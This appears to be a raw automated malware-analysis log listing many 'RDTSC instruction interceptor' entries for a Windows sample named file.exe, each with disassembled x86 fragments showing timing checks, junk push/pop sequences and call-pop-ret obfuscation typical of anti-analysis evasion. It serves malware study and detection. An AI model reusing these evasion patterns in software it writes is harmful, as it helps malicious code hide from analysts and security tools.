Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D8A second address: FB3DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3DA0 second address: FB3DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB96A5 second address: FB96A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB9B62 second address: FB9B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82165 second address: F82174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F4B90BE6226h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CD1 second address: FC1CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4B9132D696h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CE0 second address: FC1CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CE6 second address: FC1CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CEA second address: FC1CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CEE second address: FC1CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CFC second address: FC1D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4B90BE622Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1133 second address: FC1143 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4B9132D696h 0x00000008 jnc 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1143 second address: FC1148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3BA3 second address: FC3BAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3CBC second address: FC3CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3F65 second address: FC3F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC405A second address: FC4068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4887 second address: FC488D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4941 second address: FC4945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4D4B second address: FC4D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4D50 second address: FC4D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6233h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4E6E second address: FC4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4E73 second address: FC4E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83CE2 second address: F83CFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F4B9132D69Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4B9132D696h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83CFB second address: F83D11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83D11 second address: F83D3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B9132D6A7h 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83D3C second address: F83D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC699F second address: FC6A0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4B9132D698h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov esi, ecx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F4B9132D698h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov si, A6D6h 0x0000004a mov si, bx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+124799F8h], esi 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jp 00007F4B9132D696h 0x0000005f push eax 0x00000060 pop eax 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC73E2 second address: FC73FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC73FA second address: FC7465 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F4B9132D698h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3870h], ebx 0x00000029 push 00000000h 0x0000002b cmc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4B9132D698h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 je 00007F4B9132D697h 0x0000004e stc 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 jng 00007F4B9132D696h 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7465 second address: FC746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7CBF second address: FC7CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DD7 second address: FC9DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA800 second address: FCA860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4B9132D696h 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2FC8h], edi 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F4B9132D698h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 or dword ptr [ebp+122D2FCDh], ebx 0x00000036 or dword ptr [ebp+122D2D9Bh], ecx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f movsx esi, si 0x00000042 mov dword ptr [ebp+122D3870h], edi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jbe 00007F4B9132D69Ch 0x00000051 jg 00007F4B9132D696h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC28C second address: FCC2B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6238h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F749FC second address: F74A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A00 second address: F74A0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B90BE6226h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A0C second address: F74A32 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B9132D6B1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A32 second address: F74A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC8F9 second address: FCC8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC8FD second address: FCC901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC901 second address: FCC90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC90B second address: FCC90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC90F second address: FCC937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B9132D69Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD1343 second address: FD1348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD1348 second address: FD13C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4B9132D6A2h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F4B9132D698h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movzx ebx, di 0x00000038 mov edi, dword ptr [ebp+122D2AE8h] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F4B9132D698h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F4B9132D696h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE680 second address: FCE684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD13C3 second address: FD13C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD13C9 second address: FD13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD444F second address: FD4455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD4455 second address: FD449B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F4B90BE6226h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 mov ebx, dword ptr [ebp+122D2CF0h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F4B90BE6228h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 clc 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD3737 second address: FD373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD54E4 second address: FD54EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD54EE second address: FD556A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4B9132D698h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 cld 0x00000027 sbb ecx, 18F931C8h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2C00h] 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 jne 00007F4B9132D69Ch 0x0000003e je 00007F4B9132D6AAh 0x00000044 jmp 00007F4B9132D6A4h 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007F4B9132D6A4h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD6514 second address: FD6518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD73C0 second address: FD73C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD73C4 second address: FD7441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F4B90BE6229h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F4B90BE6228h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4B90BE6228h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 jmp 00007F4B90BE6239h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD67D5 second address: FD67D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD7441 second address: FD7447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD820A second address: FD820E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD756E second address: FD759F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6232h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD759F second address: FD75A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD75A5 second address: FD75A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD8346 second address: FD834A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD834A second address: FD8362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F4B90BE622Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDA2EC second address: FDA32E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Ch 0x00000008 jns 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 or di, 26A2h 0x00000018 push 00000000h 0x0000001a jmp 00007F4B9132D69Ch 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F4B9132D696h 0x00000029 jmp 00007F4B9132D6A1h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB30A second address: FDB310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDB310 second address: FDB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD94B6 second address: FD94BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FD94BA second address: FD9556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F4B9132D6A0h 0x0000000f nop 0x00000010 jmp 00007F4B9132D6A7h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+122D28FCh] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F4B9132D698h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov bx, di 0x00000046 mov eax, dword ptr [ebp+122D04C9h] 0x0000004c mov bl, cl 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F4B9132D698h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 0000001Bh 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC1FE second address: FDC265 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F4B90BE6228h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jmp 00007F4B90BE622Ch 0x0000004a push 00000000h 0x0000004c mov di, ax 0x0000004f push eax 0x00000050 push ecx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDD296 second address: FDD315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f pushad 0x00000010 jg 00007F4B9132D696h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b call 00007F4B9132D6A3h 0x00000020 push edi 0x00000021 pop edi 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 movzx edi, si 0x00000028 push 00000000h 0x0000002a call 00007F4B9132D6A9h 0x0000002f jmp 00007F4B9132D6A1h 0x00000034 pop edi 0x00000035 mov di, si 0x00000038 push eax 0x00000039 jg 00007F4B9132D6A0h 0x0000003f pushad 0x00000040 push edx 0x00000041 pop edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FDC3CA second address: FDC3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4B90BE6226h 0x0000000d rdtsc
